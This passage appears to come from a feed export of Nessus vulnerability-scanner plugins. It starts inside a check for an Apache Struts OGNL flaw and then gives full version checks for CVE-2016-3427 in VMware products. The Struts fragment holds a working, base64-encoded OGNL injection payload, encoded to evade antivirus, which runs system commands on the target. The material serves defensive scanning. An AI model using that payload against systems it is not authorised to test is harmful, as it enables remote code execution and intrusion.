list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:51:31", "description": "The VMware vSphere Replication running on the remote host is version 5.6.x prior to 5.6.0.6, 5.8.x prior to 5.8.1.2, 6.0.x prior to 6.0.0.3, or 6.1.x prior to 6.1.1. It is, therefore, affected by a remote code execution vulnerability in the Oracle JRE JMX component due to a flaw related to the deserialization of authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\nNote that vSphere Replication is only affected if its vCloud Tunneling Agent is running, and it is not enabled by default.", "cvss3": {}, "published": "2016-06-03T00:00:00", "type": "nessus", "title": "VMware vSphere Replication Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-27T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91457", "sourceData": "#TRUSTED a0a8a56676ba2daa63fefc63e218342e8f853a776ebb0959b0ac98f78ea765b0e1911019e1f4c2280b29a694ada62f00ac52a3b6244c25f3361bf2c7a85c32705e30294667aa4133ffede95d9317e414c0cc9ca23bc5f5d8631b5b125b1c1d795d49ec6f32e872282cc36ad782a0f841d7b3e0cd448dae688033e9d34e6a0ae4f2e498c45125a8478480f1b79f779ba7455864f62280be376e6caa5a6aadda3077a94f851af9eea5148e57fe9266c4cad14241d510c31438bbe67eb6a9a2e9cadc0408e9f85b88826d45699650817218af36ae0f95aa36b7e6dd2f8223244eb91c7f735ac60e166379143db93372d17f8fd4b0a92aa8510ddff08fff41a5ad66f43dc6636cfa606745a9edfc9854b050bd0b3de6cd8ba32fe75f8b36318ec7b4ac735a02b86262333b579f0c4ea6ba831c8b91d2a95a01e599b74e521a93fe744c5ee9e6f95ad06ad462cb0ff2069d0194535485e6253ca2be26279b3e48c84e3040700c55fee40cdb1b494f80ae3112d17a09508f96d9f2ad7682dde59c776dcf8b2be209eef2d469129a444efbd183c6269907a2ef654ffd1409c946ddbd9438c74757f2f7dcbf17fc374d7167afdfec3865b2dc0f9a5a7b540877c8e3f477a21f7d0fc075e2f3f100d59b599d711feb7e3f807825fe6ed4162b8c6d4c4b7948c0024574f8749e615b94bb9b33bbdf0bbfcd82f68b8f962923f126da12921f\n#TRUST-RSA-SHA256 27166f19dc05f3c3bcd8524d6098ef1725cfd9c544c91265565497c4d3a8941717c3ac13303c2730d28809ad6547574d427867c0a067b5b73967c868d6c292ff156cec85dfd8d40404c9a80cc76595c94f75c1890e903fd6dbbd21a7a1c73a004220a5976099b2f60cdb7b2a5922e3dd38bc130107ee620504b0793abcc008b1fa2d241f09bf03ab1a2e820fe275ed5f472074a2f86471a6453d1ac6d880e732acca2c01a142f4bb966a4704bfec7cc8d06ceea68680a7fff2718e62a346a8d77d15f35218a9c7782fe051a0882cc1c9cfb0f701317f8e4e362949d920dbd3141b809d46fb1ffbdba6c30f487674ead4cfce801716aadb046120c7251ee678b55046ce5db3f4aef013ec6678afea859b0146c092adf7fa93f4339dbb3f2722594682c74282b0b7522ebe16da401e4e6b3dc6138c49ba8e5beab1a229487196f065776c9db55571c5816f44c76fcbb9e4b559c9addf0b3e0243848a3815b6b1bd8b1de9d26217999d75aee549cb11b26cccaeb113357641e1c8ca8be58dcf4b38735de74724bd28e9d0dfcb52fd8ed74db454665a9f6ffb7a3c43f6eca170dcad8ea199e54a8e13749ef5cd87905079e4fa1ceb1090431c8f0444cc34b8b72f3b333bc12c955b133aa532a407284dedc65b1c606a13adaefd922913b11bc5a0c4db230707cda85f573d5aa45542eb43e22456411fa571c69566bcb485b150db98\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91457);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/27\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vSphere Replication Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is a virtualization appliance that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication running on the remote host is version\n5.6.x prior to 5.6.0.6, 5.8.x prior to 5.8.1.2, 6.0.x prior to\n6.0.0.3, or 6.1.x prior to 6.1.1. It is, therefore, affected by a\nremote code execution vulnerability in the Oracle JRE JMX component\ndue to a flaw related to the deserialization of authentication\ncredentials. An unauthenticated, remote attacker can exploit this to\nexecute arbitrary code.\n\nNote that vSphere Replication is only affected if its vCloud Tunneling\nAgent is running, and it is not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vSphere Replication version 5.6.0.6 / 5.8.1.2 /\n6.0.0.3 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nenable_ssh_wrappers();\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\nvuln = FALSE;\n\nif (version =~ '^5\\\\.6\\\\.' && int(build) < 3845873) fix = '5.6.0.6 Build 3845873';\nelse if (version =~ '^5\\\\.8\\\\.' && int(build) < 3845890) fix = '5.8.1.2 Build 3845890';\nelse if (version =~ '^6\\\\.0\\\\.' && int(build) < 3845888) fix = '6.0.0.3 Build 3845888';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < 3849281) fix = '6.1.1 Build 3849281';\n\nif (!empty(fix))\n{\n sock_g = ssh_open_connection();\n if (! sock_g)\n audit(AUDIT_HOST_NOT, \"able to connect via the provided SSH credentials.\");\n info_t = INFO_SSH;\n\n line = info_send_cmd(cmd:\"service vmware-vcd status\");\n ssh_close_connection();\n\n if (\n \"vmware-vcd-watchdog is running\" >< line &&\n \"vmware-vcd-cell is running\" >< line\n )\n {\n vuln = TRUE;\n }\n else\n exit(0, \"vCloud Tunneling Agent does not appear to be running on the VMware vSphere Replication appliance examined (Version \" + verui + \").\");\n\n}\n\nif (vuln)\n{\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(\n extra : report,\n port : '0',\n severity : SECURITY_HOLE\n );\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:49:41", "description": "The version of VMware vCenter Server installed on the remote host is 5.0.x prior to 5.0u3e, 5.1.x prior to 5.1u3b, 5.5.x prior to 5.5u3 (Linux), 5.5.x prior to 5.5u3b (Windows), or 6.0.x prior to 6.0.0b.\nIt is, therefore, affected by a flaw in Oracle JMX when deserializing authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {}, "published": "2016-05-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 5.0.x < 5.0u3e / 5.1.x < 5.1u3b / 5.5.x < 5.5u3 (Linux) / 5.5.x < 5.5u3b (Windows) / 6.0.x < 6.0.0b JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2016-0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91322", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91322);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vCenter Server 5.0.x < 5.0u3e / 5.1.x < 5.1u3b / 5.5.x < 5.5u3 (Linux) / 5.5.x < 5.5u3b (Windows) / 6.0.x < 6.0.0b JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host\nis affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is\n5.0.x prior to 5.0u3e, 5.1.x prior to 5.1u3b, 5.5.x prior to 5.5u3\n(Linux), 5.5.x prior to 5.5u3b (Windows), or 6.0.x prior to 6.0.0b.\nIt is, therefore, affected by a flaw in Oracle JMX when deserializing\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server version 5.0u3e (5.0.0 build-3073236)\n/ 5.1u3b on Linux or Windows (5.1.0 build-3070521) / 5.1u3d on Windows\n(5.1.0 build-3814779) / 5.5u3 on Linux (5.5.0 build-3000241) / 5.5u3b\non Windows (5.5.0 build-3252642) / 5.5u3d on Windows (5.5.0\nbuild-3721164) / 6.0.0b (6.0.0 build-2776510) or later.\n\nNote that vCenter Server Windows releases 5.0 u3e, 5.1 u3b, and 5.5\nu3b additionally require KB 2144428 to be applied. See VMSA-2015-0007\nfor details. Alternatively, versions 5.1 and 5.5 on Windows may be\nfixed with their respective u3d builds.\n\nFurthermore, remote and local exploitation of this vulnerability is\nfeasible on vCenter Server 6.0 and 6.0.0a for Windows. Remote\nexploitation is not feasible on vCenter Server 6.0.0b (and above) for\nWindows but local exploitation is. The local exploitation\nvulnerability can be resolved by applying the steps of KB 2145343 to\nvCenter Server version 6.0.0b (and above) for Windows.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service.nasl\", \"os_fingerprint.nasl\", \"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit(\"Host/VMware/vCenter\");\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (empty_or_null(build) || build !~ '^[0-9]+$') audit(AUDIT_UNKNOWN_BUILD, \"VMware vCenter Server\");\n\nbuild = int(build);\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\nos = get_kb_item(\"Host/OS\");\n\n# Check version and build numbers\nif (version =~ '^VMware vCenter 5\\\\.0$')\n{\n # 5.0 U3e\n # Windows and Linux\n # Note that Windows requires KB 2144428\n fixbuild = 3073236;\n if (build < fixbuild)\n {\n fixversion = '5.0.0 build-'+fixbuild;\n if (\"Windows\" >< os) fixversion += \" + KB 2144428\";\n }\n}\nelse if (version =~ '^VMware vCenter 5\\\\.1$')\n{\n # Possible Windows fixes include:\n # 5.1 U3b with KB 2144428\n # 5.1 U3d\n\n fixbuild = 3070521; # 5.1 U3b for Windows and Linux\n if (build < fixbuild)\n {\n fixversion = '5.1.0 build-'+fixbuild;\n if (\"Windows\" >< os)\n {\n # 5.1 U3d = build 3814779\n fixversion += ' + KB 2144428 or 5.1.0 build-3814779';\n }\n }\n}\nelse if (version =~ '^VMware vCenter 5\\\\.5$')\n{\n # If not paranoid, let's check to see if OS is populated\n if (report_paranoia < 2 && empty_or_null(os))\n exit(0, \"Can not determine version 5.5 fix build because Host/OS KB item is not set.\");\n\n if (\"Windows\" >< os)\n {\n # Possible Windows fixes include:\n # 5.5 U3b with KB 2144428\n # 5.5 U3d\n fixbuild = 3252642; # 5.5 U3b\n if (build < fixbuild)\n {\n # 5.5 U3d = build 3721164\n fixversion = '5.5.0 build-'+fixbuild+' + KB 2144428 or 5.5.0 build-3721164';\n }\n }\n else\n {\n # 5.5 U3\n fixbuild = 3000241;\n if (build < fixbuild) fixversion = '5.5.0 build-'+fixbuild;\n }\n}\nelse if (version =~ '^VMware vCenter 6\\\\.0$')\n{\n # 6.0.0b\n # Windows and Linux\n # Note that Windows requires KB 2145343\n fixbuild = 2776510;\n if (build < fixbuild)\n {\n fixversion = '6.0.0 build-'+fixbuild;\n if (\"Windows\" >< os) fixversion += \" + KB 2145343\";\n }\n}\n\nif (isnull(fixversion))\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", release,\n \"Fixed version\", fixversion\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:49:54", "description": "The remote VMware vRealize Operations Manager (vROps) 6.x host is affected by a remote code execution vulnerability in the Oracle JRE JMX component due to a flaw related to the deserialization of authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\nNote that only non-appliance versions of vRealize Operations Manager are affected by the vulnerability.", "cvss3": {}, "published": "2016-05-26T00:00:00", "type": "nessus", "title": "VMware VRealize Operations Manager 6.x Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91339);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware VRealize Operations Manager 6.x Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware vRealize Operations Manager (vROps) 6.x host is\naffected by a remote code execution vulnerability in the Oracle JRE\nJMX component due to a flaw related to the deserialization of\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\n\nNote that only non-appliance versions of vRealize Operations Manager\nare affected by the vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Block the appropriate ports per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_ports(\"installed_sw/vRealize Operations Manager\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"vRealize Operations Manager\";\n\nif(get_install_count(app_name:app) == 0)\n audit(AUDIT_NOT_INST, app);\n\nport = get_http_port(default:443, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\n\nif (version !~ \"^6($|\\.)\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\n# the mitigation is to firewall off the affected ports\n# check to see if we can establish a connection to port 9004 or 9005 (these are common among all affected versions).\n# if we can establish a connection, the remote host is likely vulnerable\nvuln = FALSE;\n\nsoc = open_sock_tcp(9004);\nport = 9004;\n\nif(!soc)\n{\n soc = open_sock_tcp(9005);\n port = 9005;\n}\n\nif(soc)\n{\n vuln = TRUE;\n close(soc);\n}\n\nif(!vuln)\n exit(0, \"Port 9004 and 9005 are not open on the remote host. Therefore, it is likely the mitigation has been applied or the host is an appliance.\");\n\nreport = '\\nVersion : ' + version + '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:52:25", "description": "The version of VMware vCloud Director installed on the remote host is 5.5.x prior to 5.5.6.1, 5.6.x prior to 5.6.5.1, or 8.0.x prior to 8.0.1.1. It is, therefore, affected by a flaw in the bundled Oracle JRE JMX subcomponent due to deserializing any class when deserializing authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {}, "published": "2016-06-24T00:00:00", "type": "nessus", "title": "VMware vCloud Director 5.5.x < 5.5.6.1 / 5.6.x < 5.6.5.1 / 8.0.x < 8.0.1.1 JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vcloud_director"], "id": "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91828);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vCloud Director 5.5.x < 5.5.6.1 / 5.6.x < 5.6.5.1 / 8.0.x < 8.0.1.1 JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCloud Director installed on the remote host is\n5.5.x prior to 5.5.6.1, 5.6.x prior to 5.6.5.1, or 8.0.x prior to\n8.0.1.1. It is, therefore, affected by a flaw in the bundled Oracle\nJRE JMX subcomponent due to deserializing any class when deserializing\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCloud Director version 5.5.6.1 / 5.6.5.1 / 8.0.1.1\nor later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcloud_director\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcloud_director_installed.nbin\");\n script_require_keys(\"Host/VMware vCloud Director/Version\", \"Host/VMware vCloud Director/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCloud Director/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware vCloud Director/Build\");\n\nfixed_ver = '';\nfixed_build = '';\n\nif (version =~ \"^5\\.5\\.\")\n{\n fixed_ver = '5.5.6.1';\n fixed_build = '3814538';\n}\nelse if (version =~ \"^5\\.6\\.\")\n{\n fixed_ver = '5.6.5.1';\n fixed_build = '3814650';\n}\nelse if (version =~ \"^8\\.0\\.\")\n{\n fixed_ver = '8.0.1.1';\n fixed_build = '3864078';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCloud 